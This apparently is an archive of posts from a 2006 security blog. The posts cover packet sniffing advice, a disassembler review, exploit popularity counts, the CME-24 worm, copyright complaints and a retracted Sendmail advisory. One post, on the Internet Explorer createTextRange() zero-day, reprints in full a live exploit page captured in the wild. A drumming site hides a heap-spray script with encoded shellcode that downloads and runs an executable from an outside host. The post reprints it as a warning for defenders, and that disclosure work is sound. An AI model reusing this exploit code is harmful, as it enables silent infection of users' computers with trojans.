Packet Sniffing

Q:

We recently had two sites defaced on our servers, and the perpetrators are claiming to have used TCPDump. Is there a cheap way to encrypt the data packets to ensure they can’t be sniffed? … [snipped]

- Rob

A:

The easiest way to encrypt data between you and the server is to use SSL or SSH. If you are connecting to a web server, enable SSL encryption, if you are connecting to a service that can be protected by SSL, enable it.

If you can’t use SSL encryption in your product, you can use OpenSSH for tunneling of traffic to the destination host, or use OpenVPN (SSL based) to encrypt the connection between you and the destination host.

Share

The NULL Terminated Strip #2 (comic strip)

The NULL Terminated Strip, second strip of this new comics.

The NULL Terminated Strip #2

Click on the image for full size.

Share

Hacked #5 (comic strip)

Hacked, fifth strip of this new comics.

Hacked #5

Click on the image for full size.

Share

diStorm – very quick (open source) stream disassembler

distorm is just another stream disassembler, but… the quickest one i have ever seen and it supports amd64. the guy (arkon, gil dabah) must have no life as this thing is very good and must have taken quite some time to develop. it is open source.

it’s available for windows, linux and general *nix. there is also a pe binary parsing library in the package.

distorm64 is an amd64 disassembler, which is the first open source disassembler library for amd64 out there, licensed under the bsd license.

distorm is a binary stream disassembler. it’s capable of disassembling 80×86 instructions in 64 bits (amd64, x86-64) and both in 16 and 32 bits. in addition, it disassembles fpu, mmx, sse, sse2, sse3 and 3dnow! (w/ extensions) and new x86-64 instruction sets. distorm was written to decode quickly every instruction as accurately as possible. robust decoding, while taking special care for valid or unused prefixes, is what makes this disassembler powerful, especially for research. another benefit that might come in handy is that the module was written as multi-threaded, which means you could disassemble several streams or more simultaneously.
for rapidly use, distorm is compiled for python and is easily used in c as well. distorm was originally written under windows and ported later to linux.

http://www.ragestorm.net/distorm/

a similar disassembler was recently released by piotr bania, called disit. also very good but my personal preference is distorm. disit is also still in beta.

gadi evron,
ge@beyondsecurity.com.

Share

Counters say MSIE 0-day exploit is extremely popular [UPDATED]

The exploit code of well known Microsoft Internet Explorer createTextRange DoS Vulnerability is remarkable popular. This has been proved by a counter located at Milw0rm.com site, visible at its Remote type codes view.

At time of writing the counter lists almost 13 000 visits. The Windows Metafile exploit code has about 9700 readers and it was more than two months ago. The number crossed 10 000 early on Monday. The code appeared to the site late on Thursday. Both of these codes has the same author ‘darkeagle‘.

Microsoft really has several reasons to patch outside of their monthly cycle with more than 200 malicious sites exploiting this flaw.

Before you drop a comment, Google has only seven links to this exploit code page. ;-)
Update: 29th March #14:25 UTC this code listing has 14 000 hits.
Update #2: 30th March: newer Metaspolit exploit release has about 2530 hits.
Update 7th April #19:00 UTC: The counter says 18600 now. Metasploit exploit has 8600 hits and Download Shellcoded Exploit released later has 4200 hits.

Share

Two Unofficial createTextRange() IE Patches

one from determina and another from eeye.

16 days to the microsoft patch.

go ilfak, you started a trend. not only does the security community do microsoft’s qa, now we also do their product updates. :)

gadi evron,
ge@beyondsecurity.com.

Share

Code Red: Opera Cannot Handle Insufficent Disk Space and the SecuriTeam vs. Sendmail armed conflict

You gotta love those hilarious security advisories:

Opera > 8.02 with torrent support can’t handle not enough space on drive

If your partition is full and u choose to save a torrent on this
partition opera will start using 100% of your cpu and momery and
eventually crash

Tested with opera 9 p 2

Our feel on this is that if you’re out of disk space, the least of your problems is Opera utilizing 100% of your CPU!

By the way, while we’re on the subject of making a fool of yourself, we did our share of the ‘sky is falling’ bit, too. But we’re professionals (well, we’ve had practice) so at least we did it with some style: We followed up with Ido’s non-existing Sendmail memory leak which got Eric Allman all worked out and ended it with a pointy cartoon. Yeah! finally a good fight. Hope it’ll last a least a mounth.

A final word to Ido: you’re new in the industry, aren’t you? Here, we don’t apologize for mistakes. We bury them in flamewars!

Share

Product Evaluation: 10 things you need to know when testing the bleeding edge of the information security

HexView has wrote up a short article on the process of doing product evaluations:

This article is intended to fill the gaps often overlooked by people when architecting security infrastructures. The list below is squeezed out of our experience in testing technology products.

Even though the article is not very long, it does stress out the 10 most important things, as well as the most common pitfalls.

The tip like the most is: Question every claim they make, and as simply as that, if a vendor claims his product uses 256 bytes for encryption, don’t believe it, verify it, most vendors will exaggerate, not because their technical guys are stupid, but rather because their sales force, and marketing team multiple everything by 2/5/10/20/etc :)

Share

CME 24

Q:

Hope you can help with this question.

If a computer is infected with CME 24 will it attempt to attack a mapped network drive?
Not just delivering its payload.

Thanks

A:

Hi,

Lets first try to understand what CME 24 is, CME – Common Malware Enumeration – is a relatively new standard in the way malwares are identified and sorted.

CME allows different vendors, such as: Aladdin Knowledge Systems, Authentium, Avira, CA, ClamAV, ESET, Fortinet, Grisoft, H+BEDV, iDefense, Kaspersky, McAfee, Microsoft, TrojanDownloader, Norman, Panda, Sophos, Symantec, and Trend Micro to name the malware they identify in such a way that the user can know that the Malware ‘X’ that company A has found is the same Malware named ‘Y’ that company B finds.

CME 24, which is also been named by the different vendors as,
Aladdin Knowledge Systems: Win32.Blackmal.e
Authentium: W32/Kapser.A@mm
AVIRA: Worm/KillAV.GR
CA: Win32/Blackmal.F
ESET: Win32/VB.NEI
Fortinet: W32/Grew.A!wm
F-Secure: Nyxem.E
Grisoft: Worm/Generic.FX
H+BEDV: Worm/KillAV.GR
Kaspersky: Email-Worm.Win32.Nyxem.e
McAfee: W32/MyWife.d@MM
Microsoft: Win32/Mywife.E@mm!CME-24
Norman: W32/Small.KI
Panda: W32/Tearec.A.worm
Sophos: W32/Nyxem-D
Symantec: W32.Blackmal.E@mm
TrendMicro: WORM_GREW.A

Destroy certain data files on an infected user’s machine on Friday, February 3, 2006.

According to our sources and independent analysis conducted on this worm, have revealed that the code should have destroyed. However, it is apparent that ITW (In the Wild) the worm’s payload does not function correctly making it unable to destroy content found on mapped drives.

Share

Internet Explorer createTextRange() 0day ITW Exploit

in the past week there has been an internet explorer 0day vulnerability in-the-wild, openly exploiting users. most of these run shellcode which downloads a trojan horse to the exploited machine. the trojan horse downloaded with each exploited site varies.

according to a chat i just had with dan hubbard from websense, more than 200 web sites hosted this code exploiting users so far. secunia issued an advisory on it.

below is an example source from one of the web pages holding the exploit code. we strongly suggest you don’t run it.

<!doctype html public “-//w3c//dtd html 4.0 transitional//en”>
<html xmlns=”http://www.w3.org/tr/rec-html40″ xmlns:o =
“urn:schemas-microsoft-com:office:office” xmlns:w =
“urn:schemas-microsoft-com:office:word” xmlns:v =
“urn:schemas-microsoft-com:vml”><head>
<meta http-equiv=content-type content=”text/html; charset=windows-1252″>
<meta content=frontpage.editor.document name=progid>
<meta content=”mshtml 6.00.2800.1226″ name=generator>
<meta content=”microsoft word 10″ name=originator><link
xhref=”introduction_files/filelist.xml” mce_href=”introduction_files/filelist.xml” rel=file-list><!–[if gte mso 9]><xml>
<o:documentproperties>
<o:author>denis le marchant-smith</o:author>
<o:template>normal</o:template>
<o:lastauthor>denis le marchant-smith</o:lastauthor>
<o:revision>2</o:revision>
<o:totaltime>1</o:totaltime>
<o:created>2003-04-19t12:24:00z</o:created>
<o:lastsaved>2003-04-19t12:24:00z</o:lastsaved>
<o:pages>1</o:pages>
<o:company>evr</o:company>
<o:lines>1</o:lines>
<o:paragraphs>1</o:paragraphs>
<o:version>10.2625</o:version>
</o:documentproperties>
</xml><![endif]–><!–[if gte mso 9]><xml>
<w:worddocument>
<w:compatibility>
<w:breakwrappedtables/>
<w:snaptogridincell/>
<w:wraptextwithpunct/>
<w:useasianbreakrules/>
</w:compatibility>
<w:browserlevel>microsoftinternetexplorer4</w:browserlevel>
</w:worddocument>
</xml><![endif]–>
<style>@page section1 {size: 8.5in 11.0in; margin: 1.0in 1.25in 1.0in 1.25in; mso-header-margin: .5in; mso-footer-margin: .5in; mso-paper-source: 0; }
p.msonormal {
font-size: 12pt; margin: 0in 0in 0pt; font-family: “times new roman”; mso-style-parent: “”; mso-pagination: widow-orphan; mso-fareast-font-family: “times new roman”
}
li.msonormal {
font-size: 12pt; margin: 0in 0in 0pt; font-family: “times new roman”; mso-style-parent: “”; mso-pagination: widow-orphan; mso-fareast-font-family: “times new roman”
}
div.msonormal {
font-size: 12pt; margin: 0in 0in 0pt; font-family: “times new roman”; mso-style-parent: “”; mso-pagination: widow-orphan; mso-fareast-font-family: “times new roman”
}
div.section1 {
page: section1
}
</style>
<!–[if gte mso 10]>
<style>
/* style definitions */
table.msonormaltable
{mso-style-name:”table normal”;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:”";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:”times new roman”}
</style>
<![endif]–><!–[if !mso]>
<style>v\:* {
behavior: url(#default#vml)
}
o\:* {
behavior: url(#default#vml)
}
w\:* {
behavior: url(#default#vml)
}
.shape {
behavior: url(#default#vml)
}
</style>
<![endif]–><!–[if gte mso 9]>
<xml><o:shapedefaults v:ext=”edit” spidmax=”1027″/>
</xml><![endif]–></head>
<body lang=en-us style=”tab-interval: .5in” bgcolor=#000000 background=”background.gif”>
<div id=dot0
style=”visibility: hidden; width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”" mce_src=”" width=11> </div>
<div id=dot1 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot2 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot3 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot4 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot5 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot6 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<script language=javascript>
<!– hide code

/*
elastic trail script (by philip winston @ pwinston@yahoo.com, url: http://www.geocities.com/pwinston/)
script featured on dynamicdrive.com
for this and 100′s more dhtml scripts, visit http://dynamicdrive.com
*/

var ndots = 7;

var xpos = 0;
var ypos = 0;

// fixed time step, no relation to real time
var deltat = .01;
// size of one spring in pixels
var seglen = 10;
// spring constant, stiffness of springs
var springk = 10;
// all the physics is bogus, just picked stuff to
// make it look okay
var mass = 1;
// positive xgravity pulls right, negative pulls left
// positive ygravity pulls down, negative up
var xgravity = 0;
var ygravity = 50;
// resistance determines a slowing force proportional to velocity
var resistance = 10;
// stopping criterea to prevent endless jittering
// doesn’t work when sitting on bottom since floor
// doesn’t push back so acceleration always as big
// as gravity
var stopvel = 0.1;
var stopacc = 0.1;
var dotsize = 11;
// bounce is percent of velocity retained when
// bouncing off a wall
var bounce = 0.75;

var isnetscape = navigator.appname==”netscape”;

// always on for now, could be played with to
// let dots fall to botton, get thrown, etc.
var followmouse = true;

var dots = new array();
init();

function init()
{
var i = 0;
for (i = 0; i < ndots; i++) {
dots[i] = new dot(i);
}

if (!isnetscape) {
// i only know how to read the locations of the
// <li> items in ie
//skip this for now
// setinitpositions(dots)
}

// set their positions
for (i = 0; i < ndots; i++) {
dots[i].obj.left = dots[i].x;
dots[i].obj.top = dots[i].y;
}

if (isnetscape) {
// start right away since they are positioned
// at 0, 0
startanimate();
} else {
// let dots sit there for a few seconds
// since they’re hiding on the real bullets
settimeout(“startanimate()”, 1000);
}
}

function dot(i)
{
this.x = xpos;
this.y = ypos;
this.dx = 0;
this.dy = 0;
if (isnetscape) {
this.obj = eval(“document.dot” + i);
} else {
this.obj = eval(“dot” + i + “.style”);
}
}

function startanimate() {
setinterval(“animate()”, 20);
}

// this is to line up the bullets with actual li tags on the page
// had to add -dotsize to x and 2*dotsize to y for ie 5, not sure why
// still doesn’t work great
function setinitpositions(dots)
{
// initialize dot positions to be on top
// of the bullets in the <ul>
var startloc = document.all.tags(“li”);
var i = 0;
for (i = 0; i < startloc.length && i < (ndots – 1); i++) {
dots[i+1].x = startloc[i].offsetleft
startloc[i].offsetparent.offsetleft – dotsize;
dots[i+1].y = startloc[i].offsettop +
startloc[i].offsetparent.offsettop + 2*dotsize;
}
// put 0th dot above 1st (it is hidden)
dots[0].x = dots[1].x;
dots[0].y = dots[1].y – seglen;
}

// just save mouse position for animate() to use
function movehandler(e)
{
xpos = e.pagex;
ypos = e.pagey;
return true;
}

// just save mouse position for animate() to use
function movehandlerie() {
xpos = window.event.x + document.body.scrollleft;
ypos = window.event.y + document.body.scrolltop;
}

if (isnetscape) {
document.captureevents(event.mousemove);
document. = movehandler;
} else {
document. = movehandlerie;
}

function vec(x, y)
{
this.x = x;
this.y = y;
}

// adds force in x and y to spring for dot[i] on dot[j]
function springforce(i, j, spring)
{
var dx = (dots[i].x – dots[j].x);
var dy = (dots[i].y – dots[j].y);
var len = math.sqrt(dx*dx + dy*dy);
if (len > seglen) {
var springf = springk * (len – seglen);
spring.x += (dx / len) * springf;
spring.y += (dy / len) * springf;
}
}

function animate() {
// dots[0] follows the mouse,
// though no dot is drawn there
var start = 0;
if (followmouse) {
dots[0].x = xpos;
dots[0].y = ypos;
start = 1;
}

for (i = start ; i < ndots; i++ ) {

var spring = new vec(0, 0);
if (i > 0) {
springforce(i-1, i, spring);
}
if (i < (ndots – 1)) {
springforce(i+1, i, spring);
}

// air resisitance/friction
var resist = new vec(-dots[i].dx * resistance,
-dots[i].dy * resistance);

// compute new accel, including gravity
var accel = new vec((spring.x + resist.x)/mass + xgravity,
(spring.y + resist.y)/ mass + ygravity);

// compute new velocity
dots[i].dx += (deltat * accel.x);
dots[i].dy += (deltat * accel.y);

// stop dead so it doesn’t jitter when nearly still
if (math.abs(dots[i].dx) < stopvel &&
math.abs(dots[i].dy) < stopvel &&
math.abs(accel.x) < stopacc &&
math.abs(accel.y) < stopacc) {
dots[i].dx = 0;
dots[i].dy = 0;
}

// move to new position
dots[i].x += dots[i].dx;
dots[i].y += dots[i].dy;

// get size of window
var height, width;
if (isnetscape) {
height = window.innerheight + window.pageyoffset;
width = window.innerwidth + window.pagexoffset;
} else {
height = document.body.clientheight + document.body.scrolltop;
width = document.body.clientwidth + document.body.scrollleft;
}

// bounce off 3 walls (leave ceiling open)
if (dots[i].y >= height – dotsize – 1) {
if (dots[i].dy > 0) {
dots[i].dy = bounce * -dots[i].dy;
}
dots[i].y = height – dotsize – 1;
}
if (dots[i].x >= width – dotsize) {
if (dots[i].dx > 0) {
dots[i].dx = bounce * -dots[i].dx;
}
dots[i].x = width – dotsize – 1;
}
if (dots[i].x < 0) {
if (dots[i].dx < 0) {
dots[i].dx = bounce * -dots[i].dx;
}
dots[i].x = 0;
}

// move img to new position
dots[i].obj.left = dots[i].x;
dots[i].obj.top = dots[i].y;
}
}

// end code hiding –>
</script>

<p align=center>‚†</p>
<p align=center>‚†</p>
<p align=center><font face=fifthave><!–[if gte vml 1]><v:shapetype
id=_x0000_t170 coordsize = “21600,21600″ o:spt = “170″ path =
” m@0,0 l@1,0 m0,21600 l21600,21600 e” adj = “7200″><v:formulas><v:f eqn =
“sum #0 0 0 “></v:f><v:f eqn = “sum 21600 0 @0 “></v:f><v:f eqn =
“prod #0 1 2 “></v:f><v:f eqn = “sum 21600 0 @2 “></v:f><v:f eqn =
“sum @1 21600 @0 “></v:f></v:formulas><v:path o:connectangles=”270,180,90,0″
o:connectlocs=”10800,0;@2,10800;10800,21600;@3,10800″ textpathok = “t”
o:connecttype = “custom”></v:path><v:textpath on = “t” fitshape =
“t”></v:textpath><v:handles><v:h xrange=”0,10792″
position=”#0,topleft”></v:h></v:handles><o:lock shapetype=”t” text=”t”
v:ext=”edit”></o:lock></v:shapetype><v:shape id=_x0000_s1028
style=”width: 300.75pt; height: 120.75pt” type = “#_x0000_t170″ coordsize =
“21600,21600″ alt = “rock drumming” fillcolor = “blue” strokecolor =
“red” strokeweight = “12668emu” adj = “2158″><v:shadow on = “t” type =
“perspective” color = “#875b0d” opacity = “45875f” matrix =
“,,,.5,0,-476837158203125e-21″ origin = “,.5″></v:shadow><v:textpath
style=”font-family: ‘arial black’; v-text-kern: t” fitpath = “t” trim = “t”
string = “rock drumming”></v:textpath></v:shape><![endif]–><![if !vml]><img border=0 width=397 height=165
xsrc=”introduction_files/image001.gif” mce_src=”introduction_files/image001.gif” alt=”rock drumming” v:shapes=”_x0000_s1028″><![endif]></font></p>
<p align=center>‚†</p>
<p align=center>‚†</p>
<p align=left>‚†</p>
<p align=left><font color=#ffffff size=6>hi, my name is alex, and i have been
playing the drums since i was four years old and i have made this website to
show you types and tips on rock drumming. so in this website you will find a lot
of things you need to know to become a rock drummer. so now you can
explore my out of this world site. you can go to different parts of my website
by clicking on the words below.</font></p>
<p align=center>‚†</p>
<p align=center>‚†</p>
<p align=center>‚†</p>
<p align=center><img height=379 xsrc=”indexfiles/duhh.gif” mce_src=”indexfiles/duhh.gif” width=278
border=0></p>
<p align=center>‚†</p>
<p align=center>‚†</p>
<p align=center><a
xhref=”tips.htm” mce_href=”tips.htm”><font
face=catchup color=#00ff00 size=7>tips</font></a></p>
<p align=center>‚†</p>
<p align=center><a
xhref=”tricks.htm” mce_href=”tricks.htm”><font
face=”copperplate gothic bold” color=#00ff00 size=7>types of
drums</font></a></p>
<p align=center>‚†</p>
<p align=center>
<font size=7><a
xhref=”drumsets.htm” mce_href=”drumsets.htm”><font
color=#00ff00>drum sets</font></a></font></font></p>
<p align=center>‚†</p>
<input type=”checkbox” id=”blah”>
<script language=”javascript”>

shellcode = unescape( “%u4343%u4343%u1fe8%u0005%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u6300%u6c61%u2e63%u7865%u0065%u6f4d%u697a %u6c6c%u2f61%u2e34%u2030%u6328%u6d6f%u6170 %u6974%u6c62%u3b65%u4d20%u4953%u2045%u2e35
%u3130%u203b%6957%u646e%u776f%u2073%u544e %u3520%u302e%u0029%u6977%u696e%u656e%u2e74 %u6c64%u006c%u0000%u0000%u0000%u0000%u0000 %u0000%u03e8%u0000%u6e49%u6574%u6e72%u7465 %u704f%u6e65%u0041%u6e49%u6574%u6e72%u7465 %u704f%u6e65%u7255%u416c%u4900%u746e%u7265 %u656e%u5274%u6165%u4664%u6c69%u0065%u6e49 %u6574%u6e72%u7465%u6c43%u736f%u4865%u6e61 %u6c64%u0065%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u7468%u7074%u2f3a%u772f%u7777 %u662e%u6c75%u666c%u7461%u6b73%u6e69%u796e %u632e%u6d6f%u632f%u2e61%u7865%u0065%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u6058%ud08b%u33fc%u64c0%u408b %u8b30%u0c40%u708b%uad1c%u688b%u5208%u5252 %u5252%u5252%u5252%u5252%u5252%u79bb%ue741 %u5288%u0068%u0002%ue800%u0191%u0000%u8b5f %u03f7%u81f8%ue8c6%u0003%ub900%u0009%u0000 %ua4f2%ubb5a%u7959%u4773%u006a%u8068%u0000 %u6a00%u6a02%u6a00%u6800%u0000%u4000%ue852 %u0161%u0000%ue85a%u014b%u0000%u4289%u8304 %u0cea%u71bb%ue8a7%u52fe%u4ae8%u0001%ubb00 %uc21b%u3b10%ue85a%u012f%u0000%u0289%uc283 %u5210%ue850%u0133%u0000%u815a%ue8c2%u0003 %u8300%u09c2%u006a%u006a%u006a%u006a%uff52 %u5ad0%u08e8%u0001%u8900%u0842%u028b%u1bbb %u10c2%u833b%u1ec2%u5052%u04e8%u0001%u5a00 %ueee8%u0000%u8b00%u8bd8%u0842%uc281%u00a8 %u0000%u006a%u0068%u0000%u6a80%u6a00%u5200 %uff50%u5ad3%ucee8%u0000%u8900%u0842%u028b %u1bbb%u10c2%u833b%u2fc2%u5052%ucae8%u0000 %u8b00%u5af0%ub2e8%u0000%u8b00%u087a%uca8b %uc183%u5a0c%u5256%u5151%ue868%u0003%u5200 %uff57%u59d6%uc00b%u0774%u3983%u7500%ueb02 %u5a2a%u5251%ue852%u0087%u0000%uda8b%uc383 %u5e0c%u006a%u8b53%u0442%u4a8b%u510c%u5056 %u4fbb%u6a47%ue807%u007b%u0000%u595a%ueb5e %u5abd%ue85e%u005f%u0000%u428b%ubb04%uc776 %ued00%ue850%u0061%u0000%ubb5a%u4179%u88e7 %u6852%u0200%u0000%u50e8%u0000%u5f00%uf78b %uf803%uc681%u03e8%u0000%u09b9%u0000%uf200 %u5aa4%uc033%uf28b%uc681%u0491%u0000%ufe8b %uc783%uc710%u1047%u0044%u0000%u21bb%u05d0 %u57d0%u5056%u6a50%u5020%u5050%u5250%u12e8 %u0000%u6100%u81c3%ue8c2%u0003%u8300%u09c2 %uc283%u8334%u0cc2%u53c3%u5756%u458b%u8b3c %u0554%u0378%u52d5%u528b%u0320%u33d5%u33c0 %u41c9%u348b%u038a%u33f5%uc1ff%u13cf%u03ac%u85f8 %u75c0%u3bf6%u75fb%u5aea%u5a8b%u0324%u66dd %u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5fc5 %u5b5e%ue0ff”);

bigblock = unescape(“%u9090%u9090″);
slackspace = 20 + shellcode.length

while (bigblock.length < slackspace)
bigblock += bigblock;

fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length + slackspace < 0×40000)
block = block + block + fillblock;

memory = new array();

for ( i = 0; i < 2020; i++ )
memory[i] = block + shellcode;

var r = document.getelementbyid(‘blah’).createtextrange();

</script>
</body></html>

gadi evron,
ge@beyondsecurity.com.

Share

Intellectual Property II

Somebody asked me:

> Rob, Did they give you these policies in advance? Any kind of writer’s
> guidance in advance?

I did, in fact, have the policy in advance, which is another and very
interesting story. This mag is part of a group, and I had previously written an
article for another of their rags. Having written the first article (and, at
the last minute, had to yell and scream when they changed the implication of the
article to the complete opposite of that intended), suddenly I couldn’t get paid
because they didn’t have a “freelance writer’s agreement” with me. So, having
wasted serious time in putting together that first article, I was eager to do
this expediciously. Maybe they could send me either a softcopy of the
agreement, or a scan, by email? Oh, no! Heaven forfend! They couldn’t make a
softcopy or scan of the agreement: the agreement itself was intellectual
property, and they wouldn’t want any possibility of unauthorized copies floating
around. (This is a mag group on high tech topics and they haven’t heard of
photocopiers?)

Anyway, the agreement is one of the more bizarre and convoluted documents I’ve
ever seen, and contradicts itself on this very point. Page two says (buried in
one paragraph) that the item supplied “has not been previously published”, while
page one says that, if it is, the supplier (that’s me) supplies the item under
the terms in the contract.

However, while I used my own previous writings, the item supplied definitely
hadn’t been published before. I’ve written extensively on the history of
computer viruses, but I’ve never before had to pare the text so sparingly,
wondering, often, if I was misrepresenting the actual situation by having to be
so terse. (But that’s always the case with magazines anyway.)

> If not, do you have a lawyer that you can talk to?

A lawyer? You’ve got to be kidding. That’s one of the major points with this
whole copyright issue, and it is a major factor with the file-sharing/RIAA/MPAA
business as well. Copyright law, and lawsuits, are the province of entities who
can afford lawyers, and writers can’t. Corporations can. So, supposing that
this publishing group decided to take what I submitted to them, not pay me, and
publish the feature anyway, even under somebody else’s name. How much is it
going to cost me to sue them? How much chance do I have of getting them to
even
answer the suit? If it did go to court, they’d be able to fill the court with
lawyers: if I *was* able to get anybody to take my case for the pittance I’d be
able to pay, do you truly think that I’d have any chance of winning, even with a
case as clear cut as all that?

I’ve got a lot of experience here, believe me. I’ve had all kinds of people
steal my stuff over the years. Once, somebody took 150 of my reviews, all of
which you have seen marked with the “copyright Robert M. Slade [year]” line, and
published them in his book. I raised that issue with the publisher. I have a
nice letter from a Vice President of John Wiley and Sons, stating that I have no
rights in the matter because, in their considered opinion, anything that appears
on the Internet is completely free of copyright protection. (Someday, when I
get mad enough, I’m going to scan some of Wiley’s books and put them on the net,
along with a copy of that letter.) Most recently, I found that a company had
posted my entire dictionary of security terms on their site. (In that case,
they did apologize and take it down. They had contracted out that part of the
Website, and had no idea that the contractor had delivered stolen goods. I have
no idea what happened to the contractor.) In any case, I can complain, and
sometimes I get an apology, or a request for permission. Never have I gotten
any money. Copyright law just doesn’t work for us producers.

(In related news, Canada recently narrowly missed having an amendment to the
copyright law here, Bill C60. There is an ongoing discussion about it in the
editorial and letters page of the Vancouver Sun. In todays paper [and in yet
another irony, the Sun won't let you see that at

http://www.canada.com/vancouversun/news/letters/story.html?id=36792a16-ae29-

433d-a89d-988f4fb0d8e3 unless you are a subscriber] someone from UBC is
sounding
the “file sharing is theft” mantra. I find this interesting because he talks
about getting royalties for materials he has written. I wrote some stuff for
UBC a while back. When someone signs up for the online course, UBC gets
$2,000,
and I get $5.)

(Oh, dear. I used a couple of lines from her message in this one. Now
I’ll have to get her to sign a formal release before I send this. Ooops, too
late. Hit the “publish” button already …)

Share

Hacked #4 (comic strip)

Hacked, fourth strip of this new comics.

Hacked #4

Click on the image for full size.

Share

Sendmail Silently-Patched Memory Leak [Deprecated]

Update:
Regarding my blog on the memory leak in Sendmail, I was wrong.
The patch fixes a minor resource-depletion issue and does not appear to have any security consequences.
I apologize for the mistake, and would like to thank Eric Allman from the sendmail team for the correction.

Ido Kanner,
SecuriTeam

Sendmail silently fixed a memory leak in the recent multiple vulnerabilities patch.

The problem occurs when a buffer is set to NULL instead of freeing its memory, causing the data to be marked as being used even though there is no variable that stores the data address.

This happens when the original (buf0) buffer and the buf buffer have different addresses.

